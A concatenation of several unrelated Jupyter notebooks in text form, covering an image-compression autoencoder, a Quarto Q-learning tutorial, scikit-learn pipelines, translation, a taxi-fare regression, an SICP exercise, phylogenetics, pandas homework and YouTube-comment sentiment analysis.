self.conv1(x) x = F.tanh(x) return self.sign(x) # + _uuid="d0bbd381684eee172d207b957bf6ce291b6d53a2" colab={} colab_type="code" id="SrQK6be2sUxv" class autoencoder(nn.Module): def __init__(self): super(autoencoder,self).__init__() self.enc = nn.Sequential(nn.Conv2d(3,32,8,stride=4,padding=2), nn.ReLU(), nn.BatchNorm2d(32), nn.Conv2d(32,64,2,stride=2), nn.ReLU(), nn.BatchNorm2d(64), nn.Conv2d(64,128,2,stride=2,padding=0), nn.ReLU(), nn.BatchNorm2d(128), nn.Conv2d(128,128,3,stride=1,padding=1), nn.Sigmoid() ) self.dec = nn.Sequential(nn.ConvTranspose2d(128,64,8,stride=4, padding=2), nn.BatchNorm2d(64), nn.ReLU(), nn.ConvTranspose2d(64,32,2,2), nn.BatchNorm2d(32), nn.ReLU(), nn.ConvTranspose2d(32,3,2,2), # nn.BatchNorm2d(32), # nn.Conv2d(32,32,3,stride=1,padding=1), # nn.BatchNorm2d(32), # nn.ConvTranspose2d(32,3,2,2), # nn.Sigmoid() ) self.binarizer = Binarizer(128,128) def forward(self,x): x = self.enc(x) x = self.binarizer(x) # print(x.shape) x = 
self.dec(x) # x = (x+1)*255 # x.round_() return x # + _uuid="b1ca0abae2d2364af138671363c34de08e73c5c0" colab={} colab_type="code" id="b4O8zNLoQO6N" batch_size = 1 ds = imgDataset() validation_split = 0.1 shuffle_dataset = True random_seed= 42 # Creating data indices for training and validation splits: dataset_size = len(ds) indices = list(range(dataset_size)) split = int(np.floor(validation_split * dataset_size)) if shuffle_dataset : np.random.seed(random_seed) np.random.shuffle(indices) train_indices, val_indices = indices[split:], indices[:split] # Creating PT data samplers and loaders: train_sampler = SubsetRandomSampler(train_indices) validation_sampler = SubsetRandomSampler(val_indices) train_loader = torch.utils.data.DataLoader(ds,batch_size=batch_size,sampler=train_sampler) validation_loader = torch.utils.data.DataLoader(ds, batch_size=batch_size,sampler=validation_sampler) # + _uuid="666fb34df46ae73f3039e3abc2fe634819007366" colab={} colab_type="code" id="JYhYkshfQTv-" model=autoencoder().float() criterion = nn.SmoothL1Loss() msssim = None optimizer = torch.optim.Adam(model.parameters(), lr=0.001) exp_lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[25,40,60], gamma=0.1) if torch.cuda.is_available(): model = model.cuda() # + _uuid="7b390b7b3bea92bf91a3414711f5c7cf677ebbee" colab={} colab_type="code" id="rDiqf5OmcF87" def train(epoch=1,model=None,optimizer=None,criterion=None,batch_size=None,history=None,train_loader=None,exp_lr_scheduler=None,validation_loader=None): while epoch<=stop_epoch: total_loss = 0 total_accuracy = 0 model.train() exp_lr_scheduler.step() print('Epoch: {}\tLR: {:.5f}'.format(epoch,exp_lr_scheduler.get_lr()[0])) for batch_idx, data in enumerate(train_loader): target = data if torch.cuda.is_available(): data = data.cuda() target = target.cuda() # forward output = model(data) # backward + optimize loss = criterion(output, target) optimizer.zero_grad() loss.backward() optimizer.step() # print statistics 
total_loss+=loss # print('Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.5f}'.format(epoch, (batch_idx + 1) * len(data), len(train_indices),100*(batch_idx + 1)* len(data) / len(train_indices), loss)) print('Train Loss: \t'+str(total_loss*batch_size/len(train_indices))) vloss, vaccuracy = validate(model,criterion,validation_loader) history['train_losses'].append((total_loss*batch_size)/len(train_indices)) history['val_losses'].append((vloss*batch_size)/len(val_indices)) history['epoch_data'].append(epoch) # visualize() epoch=1+epoch # + _uuid="9d62a0399450dae6a267f901d2118bff4c1f84d7" colab={} colab_type="code" id="U-n88wFX-fGz" def validate(model,criterion,validation_loader): total_loss = 0 total_acc = 0 model.train() for batch_idx, data in enumerate(validation_loader): target = data if torch.cuda.is_available(): data = data.cuda() target = target.cuda() output = model(data) loss = criterion(output, target).item() # optimizer.zero_grad() # loss.backward() # optimizer.step() total_loss+=loss accuracy = 0 total_acc+=accuracy return total_loss,total_acc def visualize(history): plt.figure(figsize=(15,7)) plt.plot(history['epoch_data'], history['train_losses'],label="Train Loss {:.5f}".format(history['train_losses'][-1])) plt.plot(history['epoch_data'], history['val_losses'], label="Validation Loss {:.5f}".format(history['val_losses'][-1])) # plt.plot(history['epoch_data'], history['train_accuracy'],label="Train Accuracy {:.5f}".format(history['train_accuracy'][-1])) # plt.plot(history['epoch_data'], history['val_accuracy'], label="Validation Accuracy {:.5f}".format(history['val_accuracy'][-1])) display.clear_output(wait=False) plt.legend() plt.show() # + _uuid="9c261d696a43b35fbc370302367359f4869f3451" colab={"base_uri": "https://localhost:8080/", "height": 659} colab_type="code" id="15qwd35ecGAI" outputId="d00ba44e-84f1-4df7-f0e3-7d943c665265" history = { 'train_losses':[], 'val_losses' :[], 'epoch_data' : [] } stop_epoch = 31 start = time.time() 
# Kick off training (stop_epoch and history were defined in the previous cell).
train(model=model,optimizer=optimizer,criterion=criterion,batch_size=1,history=history,train_loader=train_loader,validation_loader=validation_loader,exp_lr_scheduler=exp_lr_scheduler)
end = time.time()
# Wall-clock training time in seconds.
print(end-start)

# + _uuid="63f61e3828ce38328c2dc0e7d42118f0ad03814f"
# Plot train/validation loss curves collected during training.
visualize(history)

# + _uuid="47a7019d642d074335e5deb3f93ff457d74a62d6" colab={} colab_type="code" id="KwqD8ABdcGWp"
# Persist only the model weights.
torch.save(model.state_dict(),'model101.pt')

# + _uuid="340bb0fbd379f8785aecb407368fcd89108b5196"
def save_checkpoint(state,filename):
    """Serialize a training checkpoint dict (epoch, model and optimizer state) to disk."""
    torch.save(state, filename)

# + _uuid="a9131efecdeaec519b5f7dcdf9df5fb815baa068"
# Full resumable checkpoint: next epoch number plus model/optimizer state.
save_checkpoint({
    'epoch': history['epoch_data'][-1] + 1,
    'state_dict': model.state_dict(),
    'optimizer' : optimizer.state_dict(),
}, 'train_state101.tar')

# + _uuid="0a1b9d8c98134a2db81330b8d45f7e0d6e3d14d2"
# !ls
# -

# ## Performance Measurement

# + _uuid="18d28a78688441f22105ccc5e539bca19f601ffc"
def display_(x):
    """Show either a single image, or an (original, reconstructed) pair stacked vertically."""
    if type(x) is tuple:
        img,out = x
        fig, axes = plt.subplots(ncols=1,nrows=2,figsize=(18,30))
        axes.ravel()[0].imshow(img)
        axes.ravel()[0].set_title('Original')
        axes.ravel()[1].imshow(out)
        axes.ravel()[1].set_title('After Compression')
        plt.show()
    else:
        plt.imshow(x)

def evaluate(ds,idx, showImages = False):
    """Run one dataset image through the trained global `model` and return its MS-SSIM score.

    NOTE(review): assumes a CUDA device is available (`.cuda()`) and that
    `TF` (presumably torchvision.transforms.functional) and `pytorch_msssim`
    were imported earlier in the notebook — confirm on a fresh kernel.
    """
    model.eval()
    x = ds[idx]
    iimg = TF.to_pil_image(x)
    # Add a batch dimension before the forward pass.
    x=x.unsqueeze(0).cuda()
    y = model(x)
    oimg = TF.to_pil_image(y.squeeze(0).cpu().detach())
    score = (pytorch_msssim.msssim(x, y).item())
    # print("MSSSIM score is {:.5f}".format(score))
    if showImages:
        display_((iimg,oimg))
    return score
# -

# Score every image in the validation split and report the mean MS-SSIM.
vds = imgDataset(indices=val_indices)
total_score=0
for i in range(0,len(vds)):
    total_score += evaluate(vds,i)
print('Average MSSSIM on validation is {:.5f}'.format(total_score/len(vds)))

# Clean up the cloned pytorch-msssim checkout.
import shutil
shutil.rmtree('pytorch-msssim')
notebooks/1bppmodel.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Train your player
#
# This notebook will give a concrete example on how to train an agent for Quarto using Q-learning.
# At the end, it will also show how to submit your implementation to the arena.

# +
# Imports
from quarto.environment import Environment
from quarto.base_player import RandomPlayer, DummyPlayer
from quarto.train import train, run_duel
from copy import deepcopy
import pickle
import numpy as np

# +
# Create environment
env = Environment()
env

# +
# Implement a Q-learning agent
class QLearningPlayer:
    """Tabular Q-learning player for Quarto.

    The Q-table maps a board state (as a tuple) to a numpy array with one
    value per action (256 actions). In train mode the player follows an
    epsilon-greedy policy and updates the table after each move; otherwise
    it plays greedily and never mutates the table.
    """

    def __init__(self, train_mode):
        # Whether we are in training or playing mode
        # In training mode, this player will update its Q-table
        # and sometimes take a random action to explore more
        self.train_mode = train_mode

        # This agent's Q-table.
        # It is a map from state to action value per action:
        # q_table[state][action]: float
        self.q_table = {}
        self.action_space = 256

        # Epsilon scheduling
        self.epsilon = 1
        self.min_epsilon = 0.1
        self.epsilon_decay = 0.99995

        # Q-table update hyperparameters
        self.alpha = 0.1
        self.gamma = 1

        # Q-table update helper variables
        self.prev_state = None
        self.prev_action = None

    def start(self, state, valid_actions):
        """Called for the first move of a game; returns the chosen action."""
        # First move: take the action
        return self._take_action(state, valid_actions)

    def step(self, state, valid_actions, reward):
        """Called for every intermediate move: learn from `reward`, then act."""
        # At every other step: update the q-table and take the next action
        # Since the game hasn't finished yet, we can use current knowledge of the q-table
        # to estimate the future reward.
        if self.train_mode:
            action_values = self._get_action_values(state, valid_actions)
            self._update_q_table(reward + self.gamma * np.max(action_values))
        return self._take_action(state, valid_actions)

    def end(self, state, reward):
        """Called when the game is over; final learning update and epsilon decay."""
        # Last step: update the q-table and schedule the next value for epsilon
        # Here, the expected action-value is simply the final reward
        if self.train_mode:
            self._update_q_table(reward)
            self.epsilon = max(self.min_epsilon, self.epsilon * self.epsilon_decay)

    def _update_q_table(self, new_value):
        # Based on the reward of the previous action taken at the previous step,
        # update the q-table to be closer to the desired value.
        # Note that, if `alpha` is zero, the q-table is left unchanged,
        # if `alpha` is one, the q-table will simply take the `new_value`.
        # With a value in between, one can control the tradeoff between learning too much
        # or too little from a single move
        prev_state = tuple(self.prev_state)
        q_row = self.q_table.setdefault(prev_state, np.zeros(self.action_space))
        q_row[self.prev_action] += self.alpha * (new_value - q_row[self.prev_action])

    def _take_action(self, state, valid_actions):
        # Store the current state, copying it, otherwise the environment could mutate it afterwards
        self.prev_state = state.copy()
        if self.train_mode and np.random.random() <= self.epsilon:
            # Take a random action (epsilon-greedy exploration)
            self.prev_action = np.random.choice(valid_actions)
        else:
            # Take the action that has the highest expected future reward,
            # that is, the highest action value
            action_values = self._get_action_values(state, valid_actions)
            self.prev_action = valid_actions[np.argmax(action_values)]
        return self.prev_action

    def _get_action_values(self, state, valid_actions):
        # Convert from numpy array to tuple (dict keys must be hashable)
        state = tuple(state)
        if self.train_mode:
            # Return saved action values. If this is the first time this state is visited,
            # set all values to zero
            return self.q_table.setdefault(state, np.zeros(self.action_space))[valid_actions]
        # When not in train mode, do not change the Q-table, just return a new default for
        # every new never-visited state
        return self.q_table.get(state, np.zeros(self.action_space))[valid_actions]

    def get_freezed(self):
        """Return a frozen (non-training) deep copy of this player."""
        # Return a copy of the player, but not in train_mode
        # This is used by the training loop, to replace the adversary from time to time
        copy = deepcopy(self)
        copy.train_mode = False
        return copy

    def save(self):
        """Pickle the Q-table so the submitted player can reload it later."""
        # Save the q-table on the disk for future use
        with open('quarto/submission/player.bin', 'wb') as fp:
            pickle.dump(dict(self.q_table), fp, protocol=4)

# +
# Train the agent
player = QLearningPlayer(True)

def on_cycle_end(cycle):
    """Progress callback for `train`: print Q-table size, epsilon and best openings."""
    # Show some nice stats
    empty_state, empty_actions = env.reset()
    print(f'Q-table size={len(player.q_table)}, epsilon={player.epsilon}')
    open_moves = player._get_action_values(empty_state, empty_actions)
    best_open_moves = np.argsort(open_moves)[-5:]
    print(f'5 best opening moves={list(zip(best_open_moves, open_moves[best_open_moves]))}')

train(env, player, on_cycle_end=on_cycle_end, cycles=5)

# +
# Run some players against each other to see how they fare
players = [RandomPlayer(False), DummyPlayer(False), player.get_freezed()]
for i, p1 in enumerate(players):
    for p2 in players[i:]:
        print(p1.__class__.__name__, p2.__class__.__name__, run_duel(env, p1, p2, 1000))

# +
# Measure the number of different states recorded in the Q-table
# For each depth of the game, show the number of non-zero entries
from collections import Counter, defaultdict
info = defaultdict(Counter)
for k, v in player.q_table.items():
    depth = np.sum(np.array(k) != -1)
    played = np.sum(v != 0)
    info[depth][played] += 1
sorted((k, sorted(v.items())) for k, v in info.items())
# -

# # Submit your player to the arena
#
# 1. Write a simple Python file named `player.py` with a class named `Player` that contains your implementation and some extra code to load any saved training data (like the Q-table). You can see a working example in the folder `quarto/submission` in this repo.
#
# 2. Test your code and create the ZIP with `python -m quarto.prepare_submission`
#
# 3. Create your account in https://angers.schoolofai.fr/ and submit your player

# !python -m quarto.prepare_submission

# # Tweak the implementation, add more logs, debug, improve, have fun :)

# +
# TODO
Train your player.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     name: python3
# ---

# + [markdown] id="BuD533H3K4ed"
# # Pipeline
# A pipeline lets you run several transformation steps in an exact, fixed order.
#
# Scikit-learn provides the Pipeline class, which helps apply a sequence of
# transformations one after another.

# + id="0DD3_Z_5UFcs"
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import StandardScaler, OneHotEncoder
import numpy as np

# + [markdown] id="ax0Zmk3M1UT9"
# ### Define Pipeline

# + id="k4wr5lGYBHje"
# If your scikit-learn version is too old for SimpleImputer, use Imputer instead.
from sklearn.preprocessing import Imputer
num_pipeline = Pipeline([
    ('imputer', Imputer(strategy="median")),
    ('std_scaler', StandardScaler())
])

# + id="wDBtcS3hofhf"
# Median imputation followed by standardization.
num_pipeline = Pipeline([
    ('imputer', SimpleImputer(strategy="median")),
    ('std_scaler', StandardScaler())
])

# + id="6dyFSvCDEjUA" outputId="5c8a2242-af86-405a-adbb-e73721e9d911" colab={"base_uri": "https://localhost:8080/"}
# sample test data
test_data = np.array([10,20,30,40,50,np.nan]).reshape(-1,1)
print(test_data)
x = num_pipeline.fit_transform(test_data)
print(x)

# + [markdown] id="YzzS2ULE1s-r"
# ### Pipeline Example
#
# Create some arbitrary data needed for the pipeline exercise.
#

# + id="f-OCu0JMwGUw" outputId="b438feff-dcb1-42cf-890b-ec7b6292c89a" colab={"base_uri": "https://localhost:8080/", "height": 142}
import pandas as pd
from io import StringIO

csv_data = \
'''A,B,C,D
1.0,2.0,3.0,4.0
5.0,6.0,,8.0
10.0,11.0,12.0,'''

df = pd.read_csv(StringIO(csv_data))
df

# + id="BIMFOcsAEWlc" outputId="cee279b6-f42e-406e-feff-a0c9349a8ed0" colab={"base_uri": "https://localhost:8080/"}
# Convert to a numpy array.
df.to_numpy()
df.values

# + id="aJVnh1XXEgrw" outputId="1cfb61a2-54b0-40a6-ecd1-1bee2a293a9b" colab={"base_uri": "https://localhost:8080/"}
# Run the transformation through the pipeline with the fit_transform method.
transformed = num_pipeline.fit_transform(df.values)
print(transformed)

# + id="QyvS3J9-HIhh" outputId="d60769cb-d7f2-414f-ce1e-6ae50fe4db47" colab={"base_uri": "https://localhost:8080/"}
# You can inspect the individual steps of the pipeline.
num_pipeline.steps

# + id="ztRem80cHS-4" outputId="91144bd7-5195-42cd-c115-cf9a72b0e04a" colab={"base_uri": "https://localhost:8080/"}
num_pipeline.steps[0]

# + id="rT4oAgIlHKSf" outputId="eeb0ff0a-4da7-4de9-9f34-63cf7d8f9857" colab={"base_uri": "https://localhost:8080/"}
# You can modify some option parameters of an individual transformation step.
num_pipeline.set_params(imputer__strategy='mean') # change the missing-value imputation strategy

# + id="OPW4JzMIIiQR" outputId="0c2db41e-d3a9-4cce-efce-13b274e00695" colab={"base_uri": "https://localhost:8080/"}
transformed = num_pipeline.fit_transform(df.values)
print(transformed)

# + [markdown] id="YZsOZbINF-Ro"
# ## Exercise with the iris dataset
# Standardize the iris dataset and build a classification model using logistic regression.
# With a pipeline, everything from preprocessing to model building can be included.

# + id="rw-DmxdP3XOi"
from sklearn import datasets
from sklearn.linear_model import LogisticRegression

iris = datasets.load_iris()
features = iris.data
target = iris.target

# + id="nzzTuE-T30v5"
# Standardize, then classify.
pipe = Pipeline([
    ("std_scaler", StandardScaler()),
    ("classifier", LogisticRegression())
])

# + [markdown] id="Sy39fPT8Gt6d"
# Split the iris dataset into training and test sets; calling the fit method trains the model.

# + id="M9kn2DxF450E"
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(
    features, target, test_size =0.2, stratify=target)
model = pipe.fit(X_train, y_train)

# + [markdown] id="aOuiBFFdG8kl"
# Apply new arbitrary data to the trained model to check that it classifies.

# + id="z8Q0UNJB5Nje" outputId="b312cab4-fcf5-4a45-d703-95fe8c12358f" colab={"base_uri": "https://localhost:8080/"}
new_obs = [[0.5, 0.5, 0.5, 0.5]]
print(pipe.predict(new_obs))
print(pipe.predict_proba(new_obs))
02DataPreprocess/07Pipeline.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- from adaptnlp import EasyTranslator # + text = ["Machine learning will take over the world very soon.", "Machines can speak in many languages.",] translator = EasyTranslator() # + # Translate translations = translator.translate(text = text, t5_prefix="translate English to German", model_name_or_path="t5-small", mini_batch_size=1, min_length=0, max_length=100, early_stopping=True) print("Translations:\n") for t in translations: print(t, "\n") # -
tutorials/6. Translation/translation.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Taxi Fare Predictor

# + active=""
# This is a machine learning model which predicts taxi fare in rupees depending upon the input distance in kms
# +
# %matplotlib inline
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
# -

# # Importing Data

# +
points=np.genfromtxt('Fare.csv',delimiter=',')

# Extracting columns: column 0 = distance (km), column 1 = fare (rupees)
x=np.array(points[:,0])
y=np.array(points[:,1])

#Plotting dataset
plt.scatter(x,y)
plt.xlabel('Distance in Kms')
plt.ylabel('Fare in rupees')
plt.title('Distance v/s Fare')
plt.show()

# +
#Hyperparameters
learningRate=0.01
initial_b=0
initial_w=0
numIterations=10
# -

# Cost function

def computeCost(b,w,points):
    """Mean squared error of the line y = w*x + b over all data points."""
    totalCost=0
    N=float(len(points))
    for i in range(0,len(points)):
        x=points[i,0]
        y=points[i,1]
        totalCost=totalCost+(y-(w*x+b))**2
    return totalCost/N

# Gradient descent function

# +
def gradient_descent(points,starting_b,starting_w,learningRate,numIterations):
    """Run `numIterations` steps of batch gradient descent.

    Returns [b, w, cost_graph] where cost_graph records the cost
    before each update (useful for plotting convergence).
    """
    b=starting_b
    w=starting_w
    cost_graph=[]
    for i in range(numIterations):
        cost_graph.append(computeCost(b,w,points))
        b,w=step_gradient(b,w,np.array(points),learningRate)
    return [b,w,cost_graph]

def step_gradient(current_b,current_w,points,learningRate):
    """One gradient-descent update of (b, w) using the whole dataset."""
    gradient_w=0
    gradient_b=0
    N=float(len(points))
    for i in range(0,len(points)):
        x=points[i,0]
        y=points[i,1]
        # Partial derivatives of the mean-squared-error cost w.r.t. w and b.
        gradient_w=gradient_w+(-(2/N)*x*(y-(current_w*x+current_b)))
        gradient_b=gradient_b+(-(2/N)*(y-(current_w*x+current_b)))
    updated_w=current_w-learningRate*gradient_w
    updated_b=current_b-learningRate*gradient_b
    return updated_b,updated_w

# +
b,w,cost_graph=gradient_descent(points,initial_b,initial_w,learningRate,numIterations)

print('Optimized b:',b)
print('Optimized w',w)
print('Minimized cost:',computeCost(b,w,points))
# -

# Plotting cost per iterations

plt.plot(cost_graph)
plt.xlabel('No. of iterations')
plt.ylabel('Cost')
plt.title('Cost per iterations')
plt.show()

# Plotting line of best fit

plt.scatter(x,y)
pred=w*x+b
plt.plot(x,pred,c='r')
plt.xlabel('Distance in Kms')
plt.ylabel('Fare in rupees')
plt.title('Line of best fit')
plt.show()
Taxi Fare.ipynb
;; ---
;; jupyter:
;;   jupytext:
;;     text_representation:
;;       extension: .scm
;;       format_name: light
;;       format_version: '1.5'
;;     jupytext_version: 1.14.4
;;   kernelspec:
;;     display_name: Calysto Scheme 3
;;     language: scheme
;;     name: calysto_scheme
;; ---

;; # Exercise 1.20
;;
;;

;; +
;; Euclid's algorithm, instrumented with a print so each call is visible.
(define (gcd a b)
  (print "CALLED")
  (if (= b 0)
      a
      (gcd b (remainder a b))))

(gcd 206 40)

;; +
;; Normal-order evaluation
;; Is the number of calls infinite?
;; ==== WRONG ANSWER!!! ====
;; NO!!!
;; The expression inside the `if` condition will be evaluated every time -> w/o this evaluation the procedure cannot determine the next step
;; So the answer will be 18 remainder operations for (gcd 206 40)
(gcd 206 40)
(print "====")
(gcd 40 (remainder 206 40))
(print "====")
(gcd (remainder 206 40) (remainder 40 (remainder 206 40)))
(print "====")
(gcd (remainder 40 (remainder 206 40)) (remainder (remainder 206 40) (remainder 40 (remainder 206 40))))
(print "====")
(gcd (remainder (remainder 206 40) (remainder 40 (remainder 206 40))) (remainder (remainder 40 (remainder 206 40)) (remainder (remainder 206 40) (remainder 40 (remainder 206 40)))))

;; +
;; Applicative-order evaluation (written "Adaptive" in the original — SICP's term is applicative order)
;; 4 remainder operations
(gcd 206 40)
(print "====")
(gcd 40 (remainder 206 40))
(gcd 40 6)
(print "====")
(gcd 6 (remainder 40 6))
(gcd 6 4)
(print "====")
(gcd 4 (remainder 6 4))
(gcd 4 2)
(print "====")
(gcd 2 (remainder 4 2))
(gcd 2 0)
;; -
chapter01/ex1.20.rkt.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: jharman # language: python # name: jharman # --- # # Phylogenetics Quickstart Guide import phylogenetics as phy import phylogenetics.tools as tools import phylopandas as ph import pandas as pd # + # initialize project, create data folder project = phy.PhylogeneticsProject(project_dir='project1', overwrite=True) # read in initial seed sequence(s) for BLASTing project.read_data(path="md2_seed_sequence.txt", schema="fasta") # Run NCBI blast (default protein, 100 hits, e-value cutoff = 0.01) project.compute_blast(hitlist_size=100) # Cluster redundant sequences w/ cdhit project.compute_clusters() # Align sequences w/ muscle project.compute_alignment() # Curate alignment w/ Gblocks project.compute_gblocks() # Compute tree using PhyML project.compute_tree() # Reconstruct ancestral proteins using PAML project.compute_reconstruction() # - # View data in phylopandas dataframe object project.data.head() # + # Visualize tree and ancestors using phylovega from phylovega import TreeChart # Construct Vega Specification chart = TreeChart.from_phylopandas( project.data, height_scale=300, # Node attributes node_size=300, node_color="#ccc", # Leaf attributes leaf_labels="id", # Edge attributes edge_width=2, edge_color="#000", ) chart
examples/quickstart_guide.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3 (ipykernel)
#     language: python
#     name: python3
# ---

# Welcome to your HW1 notebook :)

# First, let's bring in our required modules (renaming them as they come in):

print("Hello INF250!")

# Your turn - create cells below, to read in the Fortune500 csv file, and compute summary for Revenues.
#
# Since you have the notebook .pynb file and the dataset files in the same dir, you can simply specify the filename of the dataset, otherwise you'd specify the entire path to the filename.
#
# You would use the Pandas .read_csv() command, to read the csv file. The result (output) of read_csv() is a DataFrame object: https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.html
#
# Once you have a dataframe (a rectangular frame of data), you can perform operations on it.
#
# a. create a cell, to read in fortune500.csv
#
# b. create a cell below, to rename the 'Revenues (in millions)' column to just 'Revenues'. Hint: use .rename(), with a columns={old:new} argument.
#
# c. create another cell, to summarize the 'Revenues' column (print out the mean, std deviation, etc). Hint: in a dataframe, each column can be accessed as a dictionary key.

# +
import pandas as pd

# BUG FIX: the original called pd.read_csv(...) without assigning the result,
# so the next cell's use of `company` raised a NameError on a fresh kernel run.
company = pd.read_csv("fortune500.csv")
company

# +
company.columns
# Rename the revenue column to just 'Revenue'.
# NOTE(review): the HW text calls the column 'Revenues (in millions)' — confirm
# the exact header name in fortune500.csv before relying on this rename.
company.rename(columns = {'Revenue (in millions)':'Revenue'}, inplace = True)
# -

# Summary statistics (count, mean, std, quartiles, ...) for the revenue column.
company[["Revenue"]].describe()

# Next, let's work on the 'iris' dataset.
#
# As before, first open the dataset, create a dataframe. Note that unlike the fortune500 dataset, this one does NOT have column names listed at the top (so you need to make sure you read all the rows as data, including the first row) - you need to 'manually' specify these column names: 'Sepal_Length', 'Sepal_Width', 'Petal_Length', 'Petal_Width', 'Class'.
#
# 'Describe' the dataset, then print out the top 5 lines.
#
# Use matplotlib to plot a histogram for each of the 4 columns - use 20 as the number of 'bins' for each column. Here's matplotlib: https://matplotlib.org/ and within it, the .hist() histogram command: https://matplotlib.org/api/_as_gen/matplotlib.pyplot.hist.html (you only need to specify a column name and num_bins, as a bare minimum).
#

# +
import pandas as pd

# BUG FIX: the iris file has NO header row, so read every row as data
# (header=None); the original call silently consumed the first flower's
# measurements as column names.
iris = pd.read_csv("irisdataset.csv", header=None)
print(iris)

# +
# Assign the column names manually, since the file has no header row.
iris.columns = ['Sepal_Length', 'Sepal_Width', 'Petal_Length', 'Petal_Width', 'Class']
print(iris)
# -

# .describe() creates a basic statistical overview. Append describe() to dataframe.
iris.describe()

# .head() allows us to display the top 5 lines (0-4). head() shows 5 rows by default.
iris.head()

# .hist() using 20 as the number of bins (bins=)
hist = iris.hist(bins=20)
hw1_DSCI250.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# + deletable=true editable=true
# %matplotlib inline
from textblob import TextBlob, Word
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(color_codes=True)

# + [markdown] deletable=true editable=true
# # Aspect Based Sentiment Analysis (ABSA) of YouTube comments

# + [markdown] deletable=true editable=true
# ABSA is really interesting since it gives a deep view of the variance of sentiments within a large corpus of text.
#
# Most sentiment systems run sentiment analysis on the entire text, which sort of 'averages out' the sentiment. Running aspect based sentiment analysis on things like product reviews or YouTube comments can help the creators understand the specific parts that the users liked.
#
# This is my attempt at running ABSA on the YouTube comments on <NAME>'s *amazing* YouTube video [here](https://www.youtube.com/watch?v=si8zZHkufRY). (PS: The video is about sentiment analysis using tflearn, but I am using TextBlob in this version for quick implementation.)

# + [markdown] deletable=true editable=true
# Data gathered using the YouTube Data API's [commentThreads.list](https://developers.google.com/youtube/v3/docs/commentThreads/list) function.
#
# Alright, here goes.
# (*Cracks fingers*)

# + deletable=true editable=true
import csv

with open('data.csv', 'r') as f:
    reader = csv.reader(f)
    result = list(reader)

result = result[0]
result[:10]

# + deletable=true editable=true
# Text cleaning
from string import punctuation
import re

def clean_sentence(sentence):
    """Lowercase a comment, strip mentions/URLs, spell-correct it, and
    remove punctuation, returning one cleaned sentence per '. '."""
    sentence = re.sub(r"(?:\@|https?\://)\S+|\n+", "", sentence.lower())
    # Fix spelling errors in comments!
    # BUG FIX: TextBlob.correct() returns a NEW corrected blob; the original
    # discarded the return value, so spelling correction never happened.
    sent = TextBlob(sentence)
    sent = sent.correct()
    clean = ""
    for sentence in sent.sentences:
        words = sentence.words
        # Remove punctuations
        words = [''.join(c for c in s if c not in punctuation) for s in words]
        words = [s for s in words if s]
        clean += " ".join(words)
        clean += ". "
    return clean

result = [clean_sentence(x) for x in result]
result[:10]

# + deletable=true editable=true
# Check sentiment polarity of each sentence.
sentiment_scores = list()
i = 0
for sentence in result:
    line = TextBlob(sentence)
    sentiment_scores.append(line.sentiment.polarity)
    # Only echo the first few comments for inspection.
    if(i <= 10):
        print(sentence + ": POLARITY=" + str(line.sentiment.polarity))
        i += 1

# + deletable=true editable=true
# Let's plot these sentiments!
sns.distplot(sentiment_scores)

# + [markdown] deletable=true editable=true
# We can see that a majority of the comments are marked as neutral (though slightly on the positive side). This basically implies that TextBlob SA 'averages' out over a sentence.
#
# So for a sentence containing : "Love your videos and humor." the polarity is 0.167 plainly because it is also followed by "curiously once training is complete how do you feed a movie review into the model or access the model ie where is model saved at the completion of training".
#
# Let's now try aspect based SA and see if we get better results!

# + deletable=true editable=true
# Convert array of comments into a single string
comments = TextBlob(' '.join(result))

# + deletable=true editable=true
# Check out noun phrases, will be useful for frequent feature extraction
comments.noun_phrases

# + [markdown] deletable=true editable=true
# # Pruning
#
# Quite a lot of these noun phrases are repeated or have the same subset of words. We now run modified versions of redundancy pruning and compactness pruning.
#
# ## Compactness pruning:
#
# We check for compact phrases and see if the words in the phrases make sense. For e.g the phrase "i m" fails the compact pruning test and is pruned. A simple way to carry out compact pruning is by checking the words in a phrase and seeing if a dictionary meaning exists. If the number of words in the phrase without dictionary meanings cross a certain threshold, we prune the phrase. (This can be counter-intuitive at times, because technical terms that do not have a dictionary meaning can get pruned).

# + deletable=true editable=true
#compactness pruning:
cleaned = list()
for phrase in comments.noun_phrases:
    count = 0
    for word in phrase.split():
        # Count the number of small words and words without an English definition
        if len(word) <= 2 or (not Word(word).definitions):
            count += 1
    # Only if the 'nonsensical' or short words DO NOT make up more than 40% (arbitrary) of the phrase add
    # it to the cleaned list, effectively pruning the ones not added.
    if count < len(phrase.split())*0.4:
        cleaned.append(phrase)

print("After compactness pruning:\nFeature Size:")
len(cleaned)

# + [markdown] deletable=true editable=true
# ## Redundancy pruning:
# I am using a naive decision of choosing the _largest common noun phrase_ as a non-redundant feature. A better way would be to find 'important' terms in common noun phrases and choose those. One approach to that could be something called TF-IDF (more about that [here](http://stevenloria.com/finding-important-words-in-a-document-using-tf-idf/)).

# + deletable=true editable=true
